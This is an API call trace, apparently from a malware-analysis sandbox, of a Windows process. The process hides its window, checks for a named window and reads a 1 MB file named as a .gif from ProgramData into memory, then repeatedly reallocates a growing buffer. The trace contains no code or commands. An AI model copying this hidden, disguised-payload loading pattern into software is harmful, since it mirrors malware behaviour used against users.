[0137.371] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0137.371] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0137.371] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0137.372] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0137.372] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0137.372] GetCurrentThreadId () returned 0x89c
[0137.372] GlobalAddAtomA (lpString="WndProcPtr004000000000089C") returned 0xc126
[0137.372] VirtualAlloc (lpAddress=0x12a4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x12a4000
[0137.372] ShowWindow (hWnd=0x901e8, nCmdShow=0) returned 0
[0137.372] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0137.372] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0137.372] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f7a0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f7a0*=0) returned 0x0
[0137.373] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f798*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18f798*=0) returned 0x0
[0137.373] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f798*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18f798*=0) returned 0x10be00
[0137.373] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f798*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f798*=0) returned 0x0
[0137.373] GlobalLock (hMem=0x350004) returned 0x15b0020
[0137.373] ReadFile (in: hFile=0x98, lpBuffer=0x15b0020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x18f7b4, lpOverlapped=0x0 | out: lpBuffer=0x15b0020*, lpNumberOfBytesRead=0x18f7b4*=0x10be00, lpOverlapped=0x0) returned 1
[0137.414] CloseHandle (hObject=0x98) returned 1
[0137.414] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.415] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.415] GlobalUnlock (hMem=0x35000c) returned 0
[0137.415] GlobalReAlloc (hMem=0x35000c, dwBytes=0x4000, uFlags=0x2) returned 0x35000c
[0137.415] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.416] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.416] GlobalUnlock (hMem=0x35000c) returned 0
[0137.416] GlobalReAlloc (hMem=0x35000c, dwBytes=0x6000, uFlags=0x2) returned 0x35000c
[0137.416] GlobalLock (hMem=0x35000c) returned 0x5ba820
[0137.417] GlobalHandle (pMem=0x5ba820) returned 0x35000c
[0137.417] GlobalUnlock (hMem=0x35000c) returned 0
[0137.417] GlobalReAlloc (hMem=0x35000c, dwBytes=0x8000, uFlags=0x2) returned 0x35000c
[0137.418] GlobalLock (hMem=0x35000c) returned 0x5c0830
[0137.419] GlobalHandle (pMem=0x5c0830) returned 0x35000c
[0137.419] GlobalUnlock (hMem=0x35000c) returned 0
[0137.419] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa000, uFlags=0x2) returned 0x35000c
[0137.419] GlobalLock (hMem=0x35000c) returned 0x5c0830
[0137.419] GlobalHandle (pMem=0x5c0830) returned 0x35000c
[0137.420] GlobalUnlock (hMem=0x35000c) returned 0
[0137.420] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc000, uFlags=0x2) returned 0x35000c
[0137.420] GlobalLock (hMem=0x35000c) returned 0x5ca840
[0137.421] GlobalHandle (pMem=0x5ca840) returned 0x35000c
[0137.421] GlobalUnlock (hMem=0x35000c) returned 0
[0137.421] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe000, uFlags=0x2) returned 0x35000c
[0137.421] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.422] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.422] GlobalUnlock (hMem=0x35000c) returned 0
[0137.422] GlobalReAlloc (hMem=0x35000c, dwBytes=0x10000, uFlags=0x2) returned 0x35000c
[0137.422] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.422] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.422] GlobalUnlock (hMem=0x35000c) returned 0
[0137.422] GlobalReAlloc (hMem=0x35000c, dwBytes=0x12000, uFlags=0x2) returned 0x35000c
[0137.422] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.423] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.423] GlobalUnlock (hMem=0x35000c) returned 0
[0137.423] GlobalReAlloc (hMem=0x35000c, dwBytes=0x14000, uFlags=0x2) returned 0x35000c
[0137.423] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.424] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.424] GlobalUnlock (hMem=0x35000c) returned 0
[0137.424] GlobalReAlloc (hMem=0x35000c, dwBytes=0x16000, uFlags=0x2) returned 0x35000c
[0137.424] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.425] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.425] GlobalUnlock (hMem=0x35000c) returned 0
[0137.425] GlobalReAlloc (hMem=0x35000c, dwBytes=0x18000, uFlags=0x2) returned 0x35000c
[0137.425] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.425] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.425] GlobalUnlock (hMem=0x35000c) returned 0
[0137.425] GlobalReAlloc (hMem=0x35000c, dwBytes=0x1a000, uFlags=0x2) returned 0x35000c
[0137.425] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.426] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.426] GlobalUnlock (hMem=0x35000c) returned 0
[0137.426] GlobalReAlloc (hMem=0x35000c, dwBytes=0x1c000, uFlags=0x2) returned 0x35000c
[0137.426] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.427] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.427] GlobalUnlock (hMem=0x35000c) returned 0
[0137.427] GlobalReAlloc (hMem=0x35000c, dwBytes=0x1e000, uFlags=0x2) returned 0x35000c
[0137.427] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.428] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.428] GlobalUnlock (hMem=0x35000c) returned 0
[0137.428] GlobalReAlloc (hMem=0x35000c, dwBytes=0x20000, uFlags=0x2) returned 0x35000c
[0137.428] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.428] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.428] GlobalUnlock (hMem=0x35000c) returned 0
[0137.428] GlobalReAlloc (hMem=0x35000c, dwBytes=0x22000, uFlags=0x2) returned 0x35000c
[0137.430] GlobalLock (hMem=0x35000c) returned 0x5d6820
[0137.431] GlobalHandle (pMem=0x5d6820) returned 0x35000c
[0137.431] GlobalUnlock (hMem=0x35000c) returned 0
[0137.431] GlobalReAlloc (hMem=0x35000c, dwBytes=0x24000, uFlags=0x2) returned 0x35000c
[0137.431] GlobalLock (hMem=0x35000c) returned 0x5d6820
[0137.432] GlobalHandle (pMem=0x5d6820) returned 0x35000c
[0137.432] GlobalUnlock (hMem=0x35000c) returned 0
[0137.432] GlobalReAlloc (hMem=0x35000c, dwBytes=0x26000, uFlags=0x2) returned 0x35000c
[0137.434] GlobalLock (hMem=0x35000c) returned 0x5fa830
[0137.435] GlobalHandle (pMem=0x5fa830) returned 0x35000c
[0137.435] GlobalUnlock (hMem=0x35000c) returned 0
[0137.435] GlobalReAlloc (hMem=0x35000c, dwBytes=0x28000, uFlags=0x2) returned 0x35000c
[0137.435] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.436] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.436] GlobalUnlock (hMem=0x35000c) returned 0
[0137.436] GlobalReAlloc (hMem=0x35000c, dwBytes=0x2a000, uFlags=0x2) returned 0x35000c
[0137.436] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.436] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.436] GlobalUnlock (hMem=0x35000c) returned 0
[0137.436] GlobalReAlloc (hMem=0x35000c, dwBytes=0x2c000, uFlags=0x2) returned 0x35000c
[0137.436] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.437] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.437] GlobalUnlock (hMem=0x35000c) returned 0
[0137.437] GlobalReAlloc (hMem=0x35000c, dwBytes=0x2e000, uFlags=0x2) returned 0x35000c
[0137.437] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.438] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.438] GlobalUnlock (hMem=0x35000c) returned 0
[0137.438] GlobalReAlloc (hMem=0x35000c, dwBytes=0x30000, uFlags=0x2) returned 0x35000c
[0137.438] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.439] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.439] GlobalUnlock (hMem=0x35000c) returned 0
[0137.439] GlobalReAlloc (hMem=0x35000c, dwBytes=0x32000, uFlags=0x2) returned 0x35000c
[0137.439] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.439] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.439] GlobalUnlock (hMem=0x35000c) returned 0
[0137.439] GlobalReAlloc (hMem=0x35000c, dwBytes=0x34000, uFlags=0x2) returned 0x35000c
[0137.439] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.440] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.440] GlobalUnlock (hMem=0x35000c) returned 0
[0137.440] GlobalReAlloc (hMem=0x35000c, dwBytes=0x36000, uFlags=0x2) returned 0x35000c
[0137.440] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.441] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.441] GlobalUnlock (hMem=0x35000c) returned 0
[0137.441] GlobalReAlloc (hMem=0x35000c, dwBytes=0x38000, uFlags=0x2) returned 0x35000c
[0137.441] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.442] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.442] GlobalUnlock (hMem=0x35000c) returned 0
[0137.442] GlobalReAlloc (hMem=0x35000c, dwBytes=0x3a000, uFlags=0x2) returned 0x35000c
[0137.442] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.442] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.442] GlobalUnlock (hMem=0x35000c) returned 0
[0137.442] GlobalReAlloc (hMem=0x35000c, dwBytes=0x3c000, uFlags=0x2) returned 0x35000c
[0137.442] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.443] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.443] GlobalUnlock (hMem=0x35000c) returned 0
[0137.443] GlobalReAlloc (hMem=0x35000c, dwBytes=0x3e000, uFlags=0x2) returned 0x35000c
[0137.443] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.444] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.444] GlobalUnlock (hMem=0x35000c) returned 0
[0137.444] GlobalReAlloc (hMem=0x35000c, dwBytes=0x40000, uFlags=0x2) returned 0x35000c
[0137.444] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.444] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.444] GlobalUnlock (hMem=0x35000c) returned 0
[0137.445] GlobalReAlloc (hMem=0x35000c, dwBytes=0x42000, uFlags=0x2) returned 0x35000c
[0137.445] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.445] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.445] GlobalUnlock (hMem=0x35000c) returned 0
[0137.445] GlobalReAlloc (hMem=0x35000c, dwBytes=0x44000, uFlags=0x2) returned 0x35000c
[0137.445] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.446] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.446] GlobalUnlock (hMem=0x35000c) returned 0
[0137.446] GlobalReAlloc (hMem=0x35000c, dwBytes=0x46000, uFlags=0x2) returned 0x35000c
[0137.446] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.447] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.447] GlobalUnlock (hMem=0x35000c) returned 0
[0137.447] GlobalReAlloc (hMem=0x35000c, dwBytes=0x48000, uFlags=0x2) returned 0x35000c
[0137.447] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.447] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.447] GlobalUnlock (hMem=0x35000c) returned 0
[0137.448] GlobalReAlloc (hMem=0x35000c, dwBytes=0x4a000, uFlags=0x2) returned 0x35000c
[0137.448] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.448] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.448] GlobalUnlock (hMem=0x35000c) returned 0
[0137.448] GlobalReAlloc (hMem=0x35000c, dwBytes=0x4c000, uFlags=0x2) returned 0x35000c
[0137.448] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.449] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.449] GlobalUnlock (hMem=0x35000c) returned 0
[0137.449] GlobalReAlloc (hMem=0x35000c, dwBytes=0x4e000, uFlags=0x2) returned 0x35000c
[0137.449] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.450] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.450] GlobalUnlock (hMem=0x35000c) returned 0
[0137.450] GlobalReAlloc (hMem=0x35000c, dwBytes=0x50000, uFlags=0x2) returned 0x35000c
[0137.450] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.451] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.451] GlobalUnlock (hMem=0x35000c) returned 0
[0137.451] GlobalReAlloc (hMem=0x35000c, dwBytes=0x52000, uFlags=0x2) returned 0x35000c
[0137.451] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.451] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.451] GlobalUnlock (hMem=0x35000c) returned 0
[0137.451] GlobalReAlloc (hMem=0x35000c, dwBytes=0x54000, uFlags=0x2) returned 0x35000c
[0137.451] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.452] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.452] GlobalUnlock (hMem=0x35000c) returned 0
[0137.452] GlobalReAlloc (hMem=0x35000c, dwBytes=0x56000, uFlags=0x2) returned 0x35000c
[0137.452] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.453] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.453] GlobalUnlock (hMem=0x35000c) returned 0
[0137.453] GlobalReAlloc (hMem=0x35000c, dwBytes=0x58000, uFlags=0x2) returned 0x35000c
[0137.453] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.454] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.454] GlobalUnlock (hMem=0x35000c) returned 0
[0137.454] GlobalReAlloc (hMem=0x35000c, dwBytes=0x5a000, uFlags=0x2) returned 0x35000c
[0137.454] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.455] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.455] GlobalUnlock (hMem=0x35000c) returned 0
[0137.455] GlobalReAlloc (hMem=0x35000c, dwBytes=0x5c000, uFlags=0x2) returned 0x35000c
[0137.455] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.455] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.455] GlobalUnlock (hMem=0x35000c) returned 0
[0137.455] GlobalReAlloc (hMem=0x35000c, dwBytes=0x5e000, uFlags=0x2) returned 0x35000c
[0137.456] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.456] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.456] GlobalUnlock (hMem=0x35000c) returned 0
[0137.456] GlobalReAlloc (hMem=0x35000c, dwBytes=0x60000, uFlags=0x2) returned 0x35000c
[0137.456] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.457] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.457] GlobalUnlock (hMem=0x35000c) returned 0
[0137.457] GlobalReAlloc (hMem=0x35000c, dwBytes=0x62000, uFlags=0x2) returned 0x35000c
[0137.457] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.458] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.458] GlobalUnlock (hMem=0x35000c) returned 0
[0137.458] GlobalReAlloc (hMem=0x35000c, dwBytes=0x64000, uFlags=0x2) returned 0x35000c
[0137.458] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.458] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.458] GlobalUnlock (hMem=0x35000c) returned 0
[0137.458] GlobalReAlloc (hMem=0x35000c, dwBytes=0x66000, uFlags=0x2) returned 0x35000c
[0137.458] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.459] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.459] GlobalUnlock (hMem=0x35000c) returned 0
[0137.459] GlobalReAlloc (hMem=0x35000c, dwBytes=0x68000, uFlags=0x2) returned 0x35000c
[0137.459] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.460] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.460] GlobalUnlock (hMem=0x35000c) returned 0
[0137.460] GlobalReAlloc (hMem=0x35000c, dwBytes=0x6a000, uFlags=0x2) returned 0x35000c
[0137.460] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.461] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.461] GlobalUnlock (hMem=0x35000c) returned 0
[0137.461] GlobalReAlloc (hMem=0x35000c, dwBytes=0x6c000, uFlags=0x2) returned 0x35000c
[0137.467] GlobalLock (hMem=0x35000c) returned 0x620820
[0137.468] GlobalHandle (pMem=0x620820) returned 0x35000c
[0137.468] GlobalUnlock (hMem=0x35000c) returned 0
[0137.468] GlobalReAlloc (hMem=0x35000c, dwBytes=0x6e000, uFlags=0x2) returned 0x35000c
[0137.468] GlobalLock (hMem=0x35000c) returned 0x620820
[0137.469] GlobalHandle (pMem=0x620820) returned 0x35000c
[0137.469] GlobalUnlock (hMem=0x35000c) returned 0
[0137.469] GlobalReAlloc (hMem=0x35000c, dwBytes=0x70000, uFlags=0x2) returned 0x35000c
[0137.481] GlobalLock (hMem=0x35000c) returned 0x2480048
[0137.482] GlobalHandle (pMem=0x2480048) returned 0x35000c
[0137.482] GlobalUnlock (hMem=0x35000c) returned 0
[0137.482] GlobalReAlloc (hMem=0x35000c, dwBytes=0x72000, uFlags=0x2) returned 0x35000c
[0137.488] GlobalLock (hMem=0x35000c) returned 0x24f0058
[0137.488] GlobalHandle (pMem=0x24f0058) returned 0x35000c
[0137.488] GlobalUnlock (hMem=0x35000c) returned 0
[0137.488] GlobalReAlloc (hMem=0x35000c, dwBytes=0x74000, uFlags=0x2) returned 0x35000c
[0137.488] GlobalLock (hMem=0x35000c) returned 0x24f0058
[0137.489] GlobalHandle (pMem=0x24f0058) returned 0x35000c
[0137.489] GlobalUnlock (hMem=0x35000c) returned 0
[0137.489] GlobalReAlloc (hMem=0x35000c, dwBytes=0x76000, uFlags=0x2) returned 0x35000c
[0137.503] GlobalLock (hMem=0x35000c) returned 0x5b6810
[0137.504] GlobalHandle (pMem=0x5b6810) returned 0x35000c
[0137.504] GlobalUnlock (hMem=0x35000c) returned 0
[0137.504] GlobalReAlloc (hMem=0x35000c, dwBytes=0x78000, uFlags=0x2) returned 0x35000c
[0137.510] GlobalLock (hMem=0x35000c) returned 0x2480048
[0137.511] GlobalHandle (pMem=0x2480048) returned 0x35000c
[0137.511] GlobalUnlock (hMem=0x35000c) returned 0
[0137.511] GlobalReAlloc (hMem=0x35000c, dwBytes=0x7a000, uFlags=0x2) returned 0x35000c
[0137.517] GlobalLock (hMem=0x35000c) returned 0x24f8058
[0137.518] GlobalHandle (pMem=0x24f8058) returned 0x35000c
[0137.518] GlobalUnlock (hMem=0x35000c) returned 0
[0137.518] GlobalReAlloc (hMem=0x35000c, dwBytes=0x7c000, uFlags=0x2) returned 0x35000c
[0137.518] GlobalLock (hMem=0x35000c) returned 0x24f8058
[0137.519] GlobalHandle (pMem=0x24f8058) returned 0x35000c
[0137.519] GlobalUnlock (hMem=0x35000c) returned 0
[0137.519] GlobalReAlloc (hMem=0x35000c, dwBytes=0x7e000, uFlags=0x2) returned 0x35000c
[0137.533] GlobalLock (hMem=0x35000c) returned 0x2580048
[0137.534] GlobalHandle (pMem=0x2580048) returned 0x35000c
[0137.534] GlobalUnlock (hMem=0x35000c) returned 0
[0137.534] GlobalReAlloc (hMem=0x35000c, dwBytes=0x80000, uFlags=0x2) returned 0x35000c
[0137.550] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.551] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.551] GlobalUnlock (hMem=0x35000c) returned 0
[0137.551] GlobalReAlloc (hMem=0x35000c, dwBytes=0x82000, uFlags=0x2) returned 0x35000c
[0137.608] GlobalLock (hMem=0x35000c) returned 0x2810020
[0137.609] GlobalHandle (pMem=0x2810020) returned 0x35000c
[0137.609] GlobalUnlock (hMem=0x35000c) returned 0
[0137.609] GlobalReAlloc (hMem=0x35000c, dwBytes=0x84000, uFlags=0x2) returned 0x35000c
[0137.620] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.620] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.620] GlobalUnlock (hMem=0x35000c) returned 0
[0137.621] GlobalReAlloc (hMem=0x35000c, dwBytes=0x86000, uFlags=0x2) returned 0x35000c
[0137.632] GlobalLock (hMem=0x35000c) returned 0x2810020
[0137.633] GlobalHandle (pMem=0x2810020) returned 0x35000c
[0137.633] GlobalUnlock (hMem=0x35000c) returned 0
[0137.633] GlobalReAlloc (hMem=0x35000c, dwBytes=0x88000, uFlags=0x2) returned 0x35000c
[0137.644] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.645] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.645] GlobalUnlock (hMem=0x35000c) returned 0
[0137.645] GlobalReAlloc (hMem=0x35000c, dwBytes=0x8a000, uFlags=0x2) returned 0x35000c
[0137.661] GlobalLock (hMem=0x35000c) returned 0x2810020
[0137.662] GlobalHandle (pMem=0x2810020) returned 0x35000c
[0137.662] GlobalUnlock (hMem=0x35000c) returned 0
[0137.662] GlobalReAlloc (hMem=0x35000c, dwBytes=0x8c000, uFlags=0x2) returned 0x35000c
[0137.673] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.674] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.674] GlobalUnlock (hMem=0x35000c) returned 0
[0137.674] GlobalReAlloc (hMem=0x35000c, dwBytes=0x8e000, uFlags=0x2) returned 0x35000c
[0137.685] GlobalLock (hMem=0x35000c) returned 0x2810020
[0137.686] GlobalHandle (pMem=0x2810020) returned 0x35000c
[0137.686] GlobalUnlock (hMem=0x35000c) returned 0
[0137.686] GlobalReAlloc (hMem=0x35000c, dwBytes=0x90000, uFlags=0x2) returned 0x35000c
[0137.762] GlobalLock (hMem=0x35000c) returned 0x28a0020
[0137.762] GlobalHandle (pMem=0x28a0020) returned 0x35000c
[0137.763] GlobalUnlock (hMem=0x35000c) returned 0
[0137.763] GlobalReAlloc (hMem=0x35000c, dwBytes=0x92000, uFlags=0x2) returned 0x35000c
[0137.774] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.775] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.775] GlobalUnlock (hMem=0x35000c) returned 0
[0137.775] GlobalReAlloc (hMem=0x35000c, dwBytes=0x94000, uFlags=0x2) returned 0x35000c
[0137.787] GlobalLock (hMem=0x35000c) returned 0x2820020
[0137.788] GlobalHandle (pMem=0x2820020) returned 0x35000c
[0137.788] GlobalUnlock (hMem=0x35000c) returned 0
[0137.788] GlobalReAlloc (hMem=0x35000c, dwBytes=0x96000, uFlags=0x2) returned 0x35000c
[0137.803] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.804] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.804] GlobalUnlock (hMem=0x35000c) returned 0
[0137.804] GlobalReAlloc (hMem=0x35000c, dwBytes=0x98000, uFlags=0x2) returned 0x35000c
[0137.816] GlobalLock (hMem=0x35000c) returned 0x2820020
[0137.817] GlobalHandle (pMem=0x2820020) returned 0x35000c
[0137.817] GlobalUnlock (hMem=0x35000c) returned 0
[0137.817] GlobalReAlloc (hMem=0x35000c, dwBytes=0x9a000, uFlags=0x2) returned 0x35000c
[0137.830] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.831] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.831] GlobalUnlock (hMem=0x35000c) returned 0
[0137.831] GlobalReAlloc (hMem=0x35000c, dwBytes=0x9c000, uFlags=0x2) returned 0x35000c
[0137.845] GlobalLock (hMem=0x35000c) returned 0x2820020
[0137.846] GlobalHandle (pMem=0x2820020) returned 0x35000c
[0137.846] GlobalUnlock (hMem=0x35000c) returned 0
[0137.846] GlobalReAlloc (hMem=0x35000c, dwBytes=0x9e000, uFlags=0x2) returned 0x35000c
[0137.859] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.860] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.860] GlobalUnlock (hMem=0x35000c) returned 0
[0137.860] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa0000, uFlags=0x2) returned 0x35000c
[0137.892] GlobalLock (hMem=0x35000c) returned 0x2820020
[0137.893] GlobalHandle (pMem=0x2820020) returned 0x35000c
[0137.893] GlobalUnlock (hMem=0x35000c) returned 0
[0137.893] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa2000, uFlags=0x2) returned 0x35000c
[0137.907] GlobalLock (hMem=0x35000c) returned 0x28d0020
[0137.907] GlobalHandle (pMem=0x28d0020) returned 0x35000c
[0137.908] GlobalUnlock (hMem=0x35000c) returned 0
[0137.908] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa4000, uFlags=0x2) returned 0x35000c
[0137.921] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.922] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.922] GlobalUnlock (hMem=0x35000c) returned 0
[0137.922] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa6000, uFlags=0x2) returned 0x35000c
[0137.969] GlobalLock (hMem=0x35000c) returned 0x2830020
[0137.970] GlobalHandle (pMem=0x2830020) returned 0x35000c
[0137.970] GlobalUnlock (hMem=0x35000c) returned 0
[0137.970] GlobalReAlloc (hMem=0x35000c, dwBytes=0xa8000, uFlags=0x2) returned 0x35000c
[0137.983] GlobalLock (hMem=0x35000c) returned 0x2780020
[0137.984] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0137.984] GlobalUnlock (hMem=0x35000c) returned 0
[0137.984] GlobalReAlloc (hMem=0x35000c, dwBytes=0xaa000, uFlags=0x2) returned 0x35000c
[0138.054] GlobalLock (hMem=0x35000c) returned 0x2830020
[0138.055] GlobalHandle (pMem=0x2830020) returned 0x35000c
[0138.055] GlobalUnlock (hMem=0x35000c) returned 0
[0138.055] GlobalReAlloc (hMem=0x35000c, dwBytes=0xac000, uFlags=0x2) returned 0x35000c
[0138.069] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.070] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.070] GlobalUnlock (hMem=0x35000c) returned 0
[0138.070] GlobalReAlloc (hMem=0x35000c, dwBytes=0xae000, uFlags=0x2) returned 0x35000c
[0138.084] GlobalLock (hMem=0x35000c) returned 0x2830020
[0138.085] GlobalHandle (pMem=0x2830020) returned 0x35000c
[0138.085] GlobalUnlock (hMem=0x35000c) returned 0
[0138.085] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb0000, uFlags=0x2) returned 0x35000c
[0138.099] GlobalLock (hMem=0x35000c) returned 0x28e0020
[0138.147] GlobalHandle (pMem=0x28e0020) returned 0x35000c
[0138.147] GlobalUnlock (hMem=0x35000c) returned 0
[0138.147] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb2000, uFlags=0x2) returned 0x35000c
[0138.163] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.163] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.163] GlobalUnlock (hMem=0x35000c) returned 0
[0138.164] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb4000, uFlags=0x2) returned 0x35000c
[0138.178] GlobalLock (hMem=0x35000c) returned 0x2840020
[0138.179] GlobalHandle (pMem=0x2840020) returned 0x35000c
[0138.179] GlobalUnlock (hMem=0x35000c) returned 0
[0138.179] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb6000, uFlags=0x2) returned 0x35000c
[0138.243] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.244] GlobalHandle (pMem=0x2780020) returned 0x35000c
